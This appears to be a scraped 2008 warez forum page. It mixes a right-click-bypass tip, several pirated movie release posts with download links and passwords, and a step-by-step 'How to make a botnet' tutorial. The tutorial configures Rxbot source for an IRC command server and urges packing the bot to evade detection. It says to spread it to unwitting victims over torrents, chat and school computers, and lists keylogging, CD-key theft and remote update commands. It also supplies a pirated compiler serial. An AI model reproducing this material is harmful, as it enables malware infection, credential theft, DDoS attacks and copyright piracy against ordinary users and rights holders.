Enabling right click on sites that disable it!

lots of web sites have disabled the right click function of the mouse button...
This is done so that you don't steal (right-click->save picture etc.) their photos or images or any other goodies. So it disables ALL right-click functionality: copy, paste, open in new window.
Here is a fix for this.
It's easy to change, assuming your using IE 6:
Click "Tools"->"Internet Options"
Click the "Security" tab
Click "Custom Level"
Scroll down to the "Scripting" section
Set "Active Scripting" to "disable"
Click "Ok" a couple of times.

You'll probably want to turn this back to "enable" when your done... 'cause generally the javascript enhances a website.

OR

Press the right mouse button (over a picture for instance) but do not release the button (don't let it up).

The "Right-click disabled" message will pop up, so while still holding down the right mouse button, press the Enter button to dismiss the alert.

Then release the right mouse button (let it up) and you will see the context menu and can do as you please.

[RS.com] Hellboy.2.The.Golden.Army.CaM.Readnfo.XviD-TRAIDING

Image
Info:

Code:
:
░░░░░░░░░░░░░░░░░░░░░░░░░░▌
▄▄▄ ░░░░░░░░▌ ░░░░░░░░░▌
██████████████████░░▌ ░░░░░░░▌
██████████████████████ ░░░░░░▌
▐██████████████████████████ ░░░░░░▌
░██░░░░▀▀▀██████████ ░░░░░░▌
█████░░▌ ▀████████ ░░░░░░▌
██████░█ ▀███████ ░░░░░░▌
███████░ █ ███▀███ ▀██████░░░░░░▌
█▌ ░░█████ █ █ ▀█████████░░░▌ █▌
▄███ █████ ░░░░░████ █ █ ▀███████░▌ ▄███ █████
█████ ▄████████ ░░██▄▄████ █ ██ ███ ░░██████ █████ ▄████████
██████████▀██████ ░░██████████ █ █████▀ ░░░███████ ██████████▀██████
██████▀▀ █████ ░░▐███ ▀████ █ ▀▀▀ ░░░░░░██████ ██████▀▀ █████
█████ █████░░░░██▀ ████ █ ░░░░░▌ ██████ █████ █████
█████ █████░░▌ ▀ ████ █ ░░░░░▌ ██████ █████ █████
█████ █████░▌ ████ █ ░░░░▌ ██████ █████ █████
███████████▀ █████ ░░█████ ████ █ ░░░░▌ █████ █████ █████ ██████████▀
▄███████████ █████ ░░░░█████ █ ████ █ ░░░░▌ ███ █████ █████ █████ ▄██████████
█████░░░▌ █████ ████ ██████ ░░░▌ ▀████ █████ █████ █████
█████░▌ █████ ▀████████ ░▌ ▐██ ████ █████ █████
░█████ █████ ████▀ ██████▌ ██ ████▀ █████ █████
░░█████ ███████ ██▀ █████████████████ ███▀ █████ ███████
░░░▌█████ █████▀ █████▀▀ ▀████████▀▀▀ ███▀ █████ █████▀
░░░▌ █████ ███▀ ░███▀ ▀▀█████ ███▀ █████ ███▀
░░▌ ▀▀▀▀ █▀ ░░░▀▀ ▀██████▀ ▀▀▀▀ █▀
░░░▌ ░░░░░░▌
░░▌ ░░░░░░▌ We Rocks Your Socks
░░░▌ ░░░░░░░▌
░░░▌ ░░░░░░░░▌
░░░░░░▌ ░░░░░░░░░▌
░░░░░░░░▌ ░░░░░░░░░░▌
░░░░░░░░░░░░░░░░░░░░░▌
░░░░░░░░░░░░░░░░░░░▌
░░░░░░░░░░░░░░░░░▌
░░░░░░░░░░░░░░▌
░░░░░░░░░░▌
░░░░░░░▌ ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▌
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▌
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▌
▒▒▒▒▒▒▒▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
▒▒▒▒▒▒▀▀ Info:
▒▒▒▒▒▒▌
▒▒▒▒▒▒▌ Hellboy.2.The.Golden.Army.CAM.XViD-nDn
▒▒▒▒▒▒▌
▒▒▒▒▒▒▌ Release Date : 07/13/2008
▒▒▒▒▒▒▌ Size : 700 mb - 49 * 14.3mb
▒▒▒▒▒▒▌ Runtime : 01:51:00
▒▒▒▒▒▒▌ Source : CAM
▒▒▒▒▒▒▌ Format : XviD
▒▒▒▒▒▒▌ Video : Decent
▒▒▒▒▒▒▌ Audio : VBR:MP3
▒▒▒▒▒▒▌ Subs : NEIN!!
▒▒▒▒▒▒▌ IMDB : http://www.imdb.com/title/tt0411477/
▒▒▒▒▒▒▌ Rating : 8.3/10 (3,691 votes)
▒▒▒▒▒▒▌
▒▒▒▒▒▒▌
▒▒▒▒▒▀
▒▒▒▒▀
▒▒▒▀ ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▌
▒▒▀ ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▌
▒▀ ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▌
▀ ▒▒▒▒▒▒▒▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
▒▒▒▒▒▒▀▀ Notes:
▒▒▒▒▒▒▌
▒▒▒▒▒▒▌

▒▒▒▒▒▒▌
▒▒▒▒▒▒▌ Here is another rlse...Its watchable so enjoy if u like..
▒▒▒▒▒▒▌ Its NTSC so im sure a nuke will soon follow.. Also..we got
▒▒▒▒▒▒▌ This silver it was cropped already..So im sure ,even though
▒▒▒▒▒▒▌ We didnt crop this it will be nuked for bad cropping..So
▒▒▒▒▒▒▌ Go ahead and nuke it for bad crop-bad ivtc-dupe frames and any
▒▒▒▒▒▒▌ other lame reasons u nuke NTSC cams for..And rls log is for ghey
▒▒▒▒▒▒▌ n00bs.
▒▒▒▒▒▒▌
▒▒▒▒▒▒▌
▒▒▒▒▒▒▌
▒▒▒▒▒▒▌
▒▒▒▒▒▒▌
▒▒▒▒▒▒▌
▒▒▒▒▒▒▌
▒▒▒▒▒▒▌
▒▒▒▒▒▀
▒▒▒▒▀
▒▒▒▀ ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▌
▒▒▀ ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▌
▒▀ ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▌
▀ ▒▒▒▒▒▒▒▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
▒▒▒▒▒▒▀▀ Greets:
▒▒▒▒▒▒▌
▒▒▒▒▒▒▌
▒▒▒▒▒▒▌ PreVail - SaGa - AlliaNce - ALTRUISM - KuDoS - BbH
▒▒▒▒▒▒▌
▒▒▒▒▒▒▌ nDn is looking for PAL Silver Suppliers-Pre Retail DVD Suppliers-
▒▒▒▒▒▒▌ Screener Suppliers-Direct Audio Suppliers-Syncers-We are NOT looking
▒▒▒▒▒▒▌ Dumps-We DO NOT PW rars so dont email us asking for PW TARDS. We
▒▒▒▒▒▒▌ Are looking for .eu.us.kr.Gbit sites only.If u can help we will hook
▒▒▒▒▒▒▌ Up Phat!
▒▒▒▒▒▒▌
▒▒▒▒▒▀
▒▒▒▒▀
▒▒▒▀
▒▒▀
▒▀


Screens:
Image
Image
Image

Download:
Code:
http://rapidshare.com/files/129840881/ts-hb2.part1.rar
http://rapidshare.com/files/129841986/ts-hb2.part2.rar
http://rapidshare.com/files/129840868/ts-hb2.part3.rar
http://rapidshare.com/files/129841920/ts-hb2.part4.rar
http://rapidshare.com/files/129840883/ts-hb2.part5.rar
http://rapidshare.com/files/129840874/ts-hb2.part6.rar
http://rapidshare.com/files/129840896/ts-hb2.part7.rar
http://rapidshare.com/files/129840646/ts-hb2.part8.rar

[NL/MU/FF/RS] Prom.Night.PROPER.DVDRip.XviD-iMBT

Image

Code:



▄▄█████████████████████████████████████████████▄
░ ░█▓▀ ▀██▓▀ ▀██ ░
░░ ░ ▐█▓ ░ ▄ ░ ▄░█▀ ▄█▀ ▀████░▄ ░ ▐█▓ ▓█░ ░
░░ ░ ░░ ▀ ▐▓▌ ▄░██▀ ▄██ ▐█▓ ▀██ ██ ░ ▐███▌ ░░
░░░ ░░ ░ ▀▀ ▄███▓ ▄░█▓ ░ █▓ █▌ ██▌ ░ ▀▓▀ ░░
░░░░ ▒░░ ░ ░░ ▄ ░ ██▀██ ▄████ ░█ ░ ██ ▐█▓ ░ ░ ░░░
▒░░░ ░░░░ ░░ ░▌ █▓ ▐█ █▓▀▐█▌ ░ █▓ ▐█▌ ██ ░░ ░ ░░░░
░░░░░░ ▒░░░ ░░░ ██ █▓ █▌▄█▓ ██ ██ ░ ▄█▓ ██▌ ░░░ ░░░ ░▓░▒
░░▓░░░░░ ░░▓░░░▒ ▐█ ░█ ▐█▐█▀ ▐█ █▓ ▄█▓▀ ▐█▓ ░░░▒ ░░░ ░░░░░░
░░░░░░▒ ░░░░░░░ ▐█▌ ██▌ ██▓▀ █▌ ░█ ▀▓██▄ ██▌ ░░░░░░░▓░ ▒░░░░░
░░░░▓░░░░░░░▒ ▄██ ▐█▓ ░ █▀ ░ ▐█ ██ ░ ▀█▌ ▐██ ░░▒ ░░░░░░░▓░░░
▒░░░░░░▒ ▄▄█▓██ ▄██ ▌ ██▄ █▓ ░ ▐██ ██▓ ░ ▄█░ ▒░░░░░░░▒
▄▄▄▄ ▄▄▄▄░██▓▀ ▐███▓ ░ ░ ░ ░ ▓██▓ ▀█▄ ▄██▌ ▐██▄ ▄██▓██▄▄▄▄▄ ▄▄▄▄
░█▓▀████▀▀██▀ ▄▄▄ ▀█▀ ▀▀ ▀████▓▀ ▄ ▀███▓▀ ▀▓█▀▀█████▀▓█░
▐█▀ ▄▄▄▄▄▄▄▄▄▄▀ ▀▄▄▄▀ Proudly Presents ▀▄▄▄▄▄▄▄▀ ▀▄▄▄▄▄▄▀▀▄▄▄▄▄▄▄▄▄▄▄ ▀█▌
█▌ ▀ ─────────────────── ▀ ▐█
█▓ -=- Prom Night (2008) -=- ▓█
█▒ ▒█
█░ Ripper ...........: Team iMBT Video Codec ......: XviD ░█
█ Release Date .....: 07/15/2008 Video Quality ....: ~923 kbps █
▐ Theater Date .....: 01/25/2008 Resolution .......: 656x272 ▌
▐ DVD RLS Date .....: 08/15/2008 Audio Codec ......: MP3 VBR ▌
▐▌ DVD Runtime ......: 01:29:12 Audio Bitrate ....: ~162 kbps ▐▌
▐ Aspect Ratio .....: 2.41:1 Subtitles ........: En... ▌
▐ Language .........: English Files ............: 49*15MB ▌
█ Film Genre .......: Horror / Thriller █
█░ IMDb URL..........: http://www.imdb.com/title/tt0926129 ░█
█▒ IMDB Rating ......: 3.8/10 (5,287 votes) ▒█
█▓░ ░▓█
██▓▒░ ░▒▓██
▐█▀▀▀▀──────┐───────────────────............───────────────────┌──────▀▀▀▀█▌
█▌ ▄▓▒░│░▒▓█▀ ......::| Summary |::...... ▀█▓▒░│░▒▓▄ ▐█
█───────────└───────────────:|. ──────────── .|:───────────────┘───────────█
█ █
▌ Directed by ▐

Nelson McCormick


Plot:




Cast:



▄ ▄
▐▓ ▓▌
██▓▒░░──────┐────────────────..................────────────────┌──────░░▒▓██
▐█▀▀▀▀▀ ▄▓▒░│░▒▓█▀ ......::| Ripper's Notes |::...... ▀█▓▒░│░▒▓▄ ▀▀▀▀▀█▌
█▌──────────└────────────:|. ────────────────── .|:────────────┘──────────▐█
█ █
▌ ▐
other rls was nuked as bad.ar.
subs: En/Es/Pt/Kr/Cn/Thai
▄ ▄
▐▓ ▓▌
██▓▒░░──────┐──────────────────..............──────────────────┌──────░░▒▓██
▐█▀▀▀▀▀ ▄▓▒░│░▒▓█▀ ......::| Group News |::...... ▀█▓▒░│░▒▓▄ ▀▀▀▀▀█▌
█▌──────────└──────────────:|. ──────────── .|:──────────────┘──────────▐█
█ █
▌ ▐

Wanna join our group?

We Need:

- Pre/Screeners DVD supplier
- 100Mbit+ Site Affil
- 10Mbit+ legit FTP for our exclusive usage

▄ ▄
▐▓ ▓▌
██▓▒░░──────┐──────────────────..............──────────────────┌──────░░▒▓██
▐█▀▀▀▀▀ ▄▓▒░│░▒▓█▀ ......::| Greetings |::...... ▀█▓▒░│░▒▓▄ ▀▀▀▀▀█▌
█▌──────────└──────────────:|. ──────────── .|:──────────────┘──────────▐█
█ █
▌ ▐
QiX DVD-R VALiOMEDiA SChiZO VoMiT
LiB PARTiCLE PROMiSE FRAGMENT HLS LiNE

▐▄ ...: Contacts :... ▄▌
█▄ ─────────|.──────────.|───────── ▄█
░ ███▄ mail @ imbtiso@hotbox.ru ▄███ ░
▒░ █▓████▓▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▓████▓█ ░▒
▓▒░ █▓▒██████▄███▓▄ ░▄█▀▓ Nfo by: SlowBeat ▓▀█▄░ ▄▓███▄██████▒▓█ ░▒▓
█▓▒ ▐█▒░██▀ ▄█▀▀█████▄ ▄██▄░▄▄▄░▄▄ -*--*- ▄▄░▄▄▄░▄██▄ ▄█████▀▀█▄ ▀██░▒█▌ ▒▓█
▐█▓▄ █▓▒░█ ▀█▌░▒▐██████████████▒▓██ 2004 ██▓▒██████████████▌▒░▐█▀ █░▒▓█ ▄▓█▌
███ ▀█▓▒░█▄▀█▄▄████▓▀▀▀▀▓███░▒▓█▌██▀ ▀██▐█▓▒░███▓▀▀▀▀▓████▄▄█▀▄█░▒▓█▀ ███
▀▄░▄ ▀▀▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀ ▄░░▄ ▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀▀ ▄░▄▀
▀ ▀▀ ▀


Rapidshare - Megaupload - NetLoad - FileFactory - Uploaded.to:100MB
interchangeable links
Code:
http://www.megaupload.com/?d=P2JGCT9X
http://www.megaupload.com/?d=8LS9PGJ0
http://www.megaupload.com/?d=Z0UQ4GJ4
http://www.megaupload.com/?d=ERQRBLMS
http://www.megaupload.com/?d=K2GJ6TYQ
http://www.megaupload.com/?d=4VPONKL0
http://www.megaupload.com/?d=JHU5KIWV

or

http://rapidshare.com/files/129842048/imbt-pmnt.part1.rar
http://rapidshare.com/files/129843014/imbt-pmnt.part2.rar
http://rapidshare.com/files/129843055/imbt-pmnt.part3.rar
http://rapidshare.com/files/129842968/imbt-pmnt.part4.rar
http://rapidshare.com/files/129842017/imbt-pmnt.part5.rar
http://rapidshare.com/files/129842035/imbt-pmnt.part6.rar
http://rapidshare.com/files/129843084/imbt-pmnt.part7.rar

or

http://www.filefactory.com/file/f34153/n/imbt-pmnt_part4_rar
http://www.filefactory.com/file/3c3306/n/imbt-pmnt_part5_rar
http://www.filefactory.com/file/e246a1/n/imbt-pmnt_part6_rar
http://www.filefactory.com/file/37c2e6/n/imbt-pmnt_part7_rar
http://www.filefactory.com/file/1c130f/n/imbt-pmnt_part2_rar
http://www.filefactory.com/file/24e03b/n/imbt-pmnt_part1_rar
http://www.filefactory.com/file/6254ce/n/imbt-pmnt_part3_rar

or

http://netload.in/datei611d260799225b21a8841d6ae2fc38f9/imbt-pmnt.part4.rar.htm
http://netload.in/datei87915924b30f402d48fb1764d9f9f08f/imbt-pmnt.part7.rar.htm
http://netload.in/datei023a293a97aa0407147709a4a88ae10f/imbt-pmnt.part3.rar.htm
http://netload.in/dateid335a5a27b2308a86ac7237ed68aa9ff/imbt-pmnt.part6.rar.htm
http://netload.in/datei379a2ac433be0af936184ffc9e8bb60a/imbt-pmnt.part2.rar.htm
http://netload.in/datei40ee80749b3edad6d7ce2a1756b9b235/imbt-pmnt.part5.rar.htm
http://netload.in/dateif486f7c2023803134328ebaf9c5148ff/imbt-pmnt.part1.rar.htm



pass:areg


NetLoad.com:400MB
Code:
http://netload.in/dateifcf0a8e57fb04df735e0c9a894c215be/Prom.Night.PROPER.DVDRip.XviD-iMBT.part1.rar.htm
http://netload.in/datei60facf14f29867310ed11cac578ca401/Prom.Night.PROPER.DVDRip.XviD-iMBT.part2.rar.htm

Daylight.Robbery.2008.DVDRiP.XviD-DvF

Daylight.Robbery.2008.DVDRiP.XviD-DvF

Using the World Cup as their cover a group of England football supporters pull off the perfect crime, stealing millions of pounds from a London Exchange bank.

Alex (Geoff Bell, The Business) masterminds an ambitious plan to steal millions of untraceable cash that is stacked in the underground vaults of The London Exchange Bank, waiting for its last journey, Incineration. Lucky (Vas Blackwood, Lock Stock) Matty (Leo Gregory, Stoned) Terry (Johnny Harris, London to Brighton) Chubby (Paul Nicholls, The Trench) Norman (Justin Salinger, Hitler) and Jay (Robert Boulter, The Long Firm) make up his unlikely gang of robbers. Setting up their alibi, the gang check in for a flight and join in with thousands of England supporters that are part of a mass exodus to The World Cup Tournament in Germany. Instead of passing through to Departure Lounge, the gang head out to the car park, pile into a van and head for Central London where they spectacularly ram raid London Exchange Bank, blocking any exit for those caught up inside. But with an unexpected turn of events, their plan is hampered from the start and they are left with a whole lot more than just a bank robbery to deal with. They have twenty hostages inside and the Police have laid siege to The Bank. There are two and a half hours before their plane leaves, and seventy million pounds in hard cash to steal. A daunting task, even for the most seasoned Blagger!

SCREENSHOTS:

Image
Image


Code:
http://www.imdb.com/title/tt0893401/


SAMPLE:

Code:
http://rapidshare.com/files/129878906/da.ro-samp-x-dvf.avi


download

Code:
http://rapidshare.com/files/129877102/da.ro-x-dvf.part1.rar
http://rapidshare.com/files/129883446/da.ro-x-dvf.part2.rar
http://rapidshare.com/files/129890509/da.ro-x-dvf.part3.rar
http://rapidshare.com/files/129900165/da.ro-x-dvf.part4.rar
http://rapidshare.com/files/129906500/da.ro-x-dvf.part5.rar
http://rapidshare.com/files/129919013/da.ro-x-dvf.part6.rar
http://rapidshare.com/files/129926852/da.ro-x-dvf.part7.rar
http://rapidshare.com/files/129926919/da.ro-x-dvf.part8.rar

[Direct/RS/MF/zSHARE/FS/HTTP] Wanted [2008] TS.XViD-mVs

Image

Image
Plot:
"Wanted" tells the tale of one apathetic nobody's transformation into an unparalleled enforcer of justice...

Code:
http://www.imdb.com/title/tt0493464/


Facts:
Quote:
DATE ......: 09-07-2008 AUDiO .....: YES
FORMAT ....: XViD GENRE .....: ACTION
QUALiTY ...: TS ARCHiVES ..: 1
LANGUAGE ..: ENGLiSH RATiNG ....: 7.5


Sample:
Code:
http://rapidshare.com/files/128543789/wanted-mvs.sample.avi


Image
Image
Image

Image
Quote:
All Links Interchangeable.


Image
Code:
http://www.mediafire.com/?hylmwywcg5h
http://www.mediafire.com/?u0odjzyrt0x
http://www.mediafire.com/?imtdldhzndd
http://www.mediafire.com/?dj2rd1qwmw2
http://www.mediafire.com/?zftbltynsnd
http://www.mediafire.com/?g4gkgyzmjh3
http://www.mediafire.com/?ujs1usmd2jq
http://www.mediafire.com/?vzsyiytmzkr

Image
Code:
http://www.zshare.net/download/15019421c1b4fe0f
http://www.zshare.net/download/1501942202267766/
http://www.zshare.net/download/15019417daa201eb/
http://www.zshare.net/download/1501942064e6eee0/
http://www.zshare.net/download/15019477ea634dfd/
http://www.zshare.net/download/150194641571b0d5/
http://www.zshare.net/download/150194474c24f41e/
http://www.zshare.net/download/15019414e4651a6a/

Image
Code:
http://www.filesend.net/download.php?f=dfe65d0d23851b65b54150819571b72c
http://www.filesend.net/download.php?f=d488fbd311207b49ad1b788cdb4f1895
http://www.filesend.net/download.php?f=9896c902c02ffd357c392d9ba2b2d5f3
http://www.filesend.net/download.php?f=aa5a2fb93be011873ede70ba6512a241
http://www.filesend.net/download.php?f=fc4ddc56753b5811d9aacf11a436f6d8
http://www.filesend.net/download.php?f=045d6fe0e5b478f305aaa0c6a649646d
http://www.filesend.net/download.php?f=597aece678b480ec009300254c7f959c
http://www.filesend.net/download.php?f=396e8ab7bf0a238c00b2af11b5a283b3

Image
Code:
http://rapidshare.com/files/128527537/backupwantedmvs.part1.rar
http://rapidshare.com/files/128531660/backupwantedmvs.part2.rar
http://rapidshare.com/files/128531070/backupwantedmvs.part3.rar
http://rapidshare.com/files/128529332/backupwantedmvs.part4.rar
http://rapidshare.com/files/128529406/backupwantedmvs.part5.rar
http://rapidshare.com/files/128529447/backupwantedmvs.part6.rar
http://rapidshare.com/files/128529390/backupwantedmvs.part7.rar
http://rapidshare.com/files/128529235/backupwantedmvs.part8.rar


1-Click Download Link: (Very Fast +Resumeable; just enter d CAPTCHA code then w8 10sec & Enjoy..!)
Code:
http://narod.ru/disk/1382396000/Wanted%5B2008%5DTS.XViD-mVs.%5BDuuuhhude%5D.tar.html

[RS.com] Meet Dave 2008 FILTERED cam XviD KingBen

Image

Release Title Meet Dave 2008 cam XviD-KingBen (Kingdom-Release)
Release Date 18 July 2008 (UK)
Release Length 01:25:40
Storyline A crew of miniature aliens operate a spaceship that has a human form. While trying to save their planet, the aliens encounter a new problem, as their ship becomes smitten with an Earth woman (Banks).

Cast
Eddie Murphy ... Dave / Captain
Elizabeth Banks ... Gina Morrison
Gabrielle Union ... No. 3 – Cultural Officer
Scott Caan ... Dooley
Ed Helms ... No. 2 – 2nd In Command
Kevin Hart ... No. 17
Mike O'Malley ... Knox
Pat Kilbane ... No. 4 – Security Officer
Judah Friedlander ... Engineer
Marc Blucas ... Mark
Jim Turner ... Doctor
Austyn Myers ... Josh (as Austin Lynd Myers)
Adam Tomei ... No. 35
Brian Huskey ... Lieutenant Right Arm
Shawn Christian ... Lieutenant Left Arm


Genre Comedy | Sci-Fi
Language English
Original Source Meet Dave 2008 CAM iNTERNAL- TorrentLeech
Total Size 801 MB

Video Specs

Format: XviD
Bitrate: 1170
Resolution: 704 x 432
Frame Rate: 23.976 fps
Size: 720 mb

Audio Specs

Type: mp3
Bitrate: 128 kbs
Sample Rate: 48000Hz
Channels: joint stereo
Size: 78.4 mb

NOTE This is a very nice 1st cam i done some tweaking to video and audio it looks great just look at screenshots
I have noticed lots of £$&^%*s (<<>

Code:
http://www.kingdom-kvcd.net


Image

IMDB
Code:
http://www.imdb.com/title/tt0765476

Code:
Sample
http://rapidshare.com/files/129542621/Sample.avi

INTERCHANGEABL LINK
http://rapidshare.com/files/129542144/MDcXVIDKB.part01.rar
http://rapidshare.com/files/129541014/MDcXVIDKB.part02.rar
http://rapidshare.com/files/129542670/MDcXVIDKB.part03.rar
http://rapidshare.com/files/129541649/MDcXVIDKB.part04.rar
http://rapidshare.com/files/129541595/MDcXVIDKB.part05.rar
http://rapidshare.com/files/129541025/MDcXVIDKB.part06.rar
http://rapidshare.com/files/129541678/MDcXVIDKB.part07.rar
http://rapidshare.com/files/129541670/MDcXVIDKB.part08.rar
http://rapidshare.com/files/129541060/MDcXVIDKB.part09.rar


http://rapidshare.com/files/129541657/MDcXVIDKB.part01.rar
http://rapidshare.com/files/129542090/MDcXVIDKB.part02.rar
http://rapidshare.com/files/129541016/MDcXVIDKB.part03.rar
http://rapidshare.com/files/129542626/MDcXVIDKB.part04.rar
http://rapidshare.com/files/129542604/MDcXVIDKB.part05.rar
http://rapidshare.com/files/129542140/MDcXVIDKB.part06.rar
http://rapidshare.com/files/129542661/MDcXVIDKB.part07.rar
http://rapidshare.com/files/129542112/MDcXVIDKB.part08.rar
http://rapidshare.com/files/129542176/MDcXVIDKB.part09.rar

How to make a botnet [full tut]

A botnet can be used to keylog computers, capture screen shots, turn on webcam and take pictures, get cdkeys, get passwords, perform DDoS attacks, run commands, open sites, basically anything really..




Here we go ladies and gentlemen.
Follow the tutorial:
-----------------------------

I. Setting up the C++ compilier: (easy)

1. Download Microsoft Visual C++ 6.0 Standard Edition

here -

http://rapidshare.com/files/125980189/msc__.rar.html

Pass: itzforblitz

Serial: 812-2224558

2. Run setup.exe and install. Remember to input serial

3. Download and install Service Pack 6

here -

http://rapidshare.com/files/125983507/Vs6sp6.rar

NOTE: Replace Mcft with Micro.soft (do not include the ".")

4. After that Download and install the Windows Platform SDK:

here - http://rapidshare.com/files/125983830/sdk.rar

Pass: itzforblitz
-------------------------------------

II. Configuring the C++ compilier (easy)

1. Open up Microsoft Visual C++ Compilier 6.0
2. Go to Tools > Options and Click the "Directories" tab
3. Now, browse to these directories and add them to the list: (Click the dotted box to add)

Code:

C:\PROGRAM FILES\MICROSOFT PLATFORM SDK
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\BIN
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\INCLUDE
C:\PROGRAM FILES\MICROSOFRT PLATFORM SDK\LIB

4. Now put them in this order: (use up and down arrows)


(it does not matter whats below those lines)
---------------------------------------

III. Configuring your bot: (easy)

1. Download and unpack: This botsource:

here - http://rapidshare.com/files/125984396/botnetsorce.rar

2. You should see an Rxbot 7.6 folder
3. Open the Rxbot 7.6 > configs.h folder and edit these lines only:


Put in quotations:
Code:

char password[] = "Bot_login_pass"; // bot password (Ex: monkey)
char server[] = "aenigma.gotd.org"; // server (Ex: irc.efnet.net)
char serverpass[] = ""; // server password (not usually needed)
char channel[] = "#botz_channel"; // channel that the bot should join
char chanpass[] = "My_channel_pass"; // channel password

Optional:
Code:

char server2[] = ""; // backup server
char channel2[] = ""; // backup channel
char chanpass2[] = ""; //Backup channel pass

-----------------------------------
IV. Building your bot: (very easy)

1. Make sure Microsoft Visual C++ is open
2. Select "File > Open Workspace"
3. Browse to your Rxbot 7.6 folder and open the rBot.dsw file
4. Right Click "rBot Files" and click Build:


5. rBot.exe will be in the Rxbot 7.6 > Debug folder !!!

YOUR DONE !!!! Now get the rbot and pack it (Use tool in third post and open rbot and click "Protect" and send it to some idiots, Some good ways are: Torrents, AIM, Friends, Myspace, School computers, and P2P but there are more ways. ENJOY !
-------------------------------------
Command list

download here -

http://rapidshare.com/files/125984564/cmands.rar

Basics:
.login botpassword will login bots
.logout will logout bots
.keylog on will turn keylogger on
.getcdkeys will retrieve cdkeys.
Read command list for more
-----------------------------------
Download mIRC

here - http://rapidshare.com/files/125984723/mirc632.rar

--------------------------------------------------------------------------------------------
How to secure your bots:

Don't be an idiot, it is easy to steal bots. All you need is the irc server address and maybe a key.
To steal bots, watch for the @login key one must upload their bot to a direct link (tdotnetwork is execellent)
and update the channel topic and run:

Code:

@update hxxp://mybot.com/download/SMSPRO.exe 82

To secure your self:

It is fairly easy to secure your bots, here is how:

1. When you are in your right click on your chat window and select "Channel Modes"
2. Make sure these options are checked:

secret and private also key (xxxx)

This way no one besides you or another op can set the channel topic Smile
Remember to make your key the same as your channel password.
------------------------------------------------------------------------
Good IRC Servers:

irc.wotnet.com is bot friendly as long as the bots do not harm the server or other users
and Zerofusion (look in mIRC) is bot friendly.

If you would like to setup a botnet on a certain server, do not intrude and make one. Talk to the admin and make sure he know that the IRC server is not doing anything illegal. If an Admin refuses, don't get angry. It is his/her server after all.
------------------------------------------------------------------------

End of tutorial

[RS/FF/MU]Harold.and.Kumar.Escape.from.Guantanamo.Bay.DVDRIP












SAMPLE
http://www.filefactory.com/file/d7a93d/


DOWNLOAD

Rapidshare
http://rapidshare.com/files/128842003/NEETIN.Harold.and.Kumar.Escape.from.Guantanamo.Bay.UNRATED.DVDRip.XviD-DiAMOND.part1.rar
http://rapidshare.com/files/128841960/NEETIN.Harold.and.Kumar.Escape.from.Guantanamo.Bay.UNRATED.DVDRip.XviD-DiAMOND.part2.rar
http://rapidshare.com/files/128841984/NEETIN.Harold.and.Kumar.Escape.from.Guantanamo.Bay.UNRATED.DVDRip.XviD-DiAMOND.part3.rar
http://rapidshare.com/files/128842015/NEETIN.Harold.and.Kumar.Escape.from.Guantanamo.Bay.UNRATED.DVDRip.XviD-DiAMOND.part4.rar
http://rapidshare.com/files/128842000/NEETIN.Harold.and.Kumar.Escape.from.Guantanamo.Bay.UNRATED.DVDRip.XviD-DiAMOND.part5.rar
http://rapidshare.com/files/128842033/NEETIN.Harold.and.Kumar.Escape.from.Guantanamo.Bay.UNRATED.DVDRip.XviD-DiAMOND.part6.rar
http://rapidshare.com/files/128841997/NEETIN.Harold.and.Kumar.Escape.from.Guantanamo.Bay.UNRATED.DVDRip.XviD-DiAMOND.part7.rar
http://rapidshare.com/files/128841654/NEETIN.Harold.and.Kumar.Escape.from.Guantanamo.Bay.UNRATED.DVDRip.XviD-DiAMOND.part8.rar


Qshare
http://www.qshare.com/get/255249/NEETIN.Harold.and.Kumar.Escape.from.Guantanamo.Bay.UNRATED.DVDRip.XviD-DiAMOND.part1.rar.html
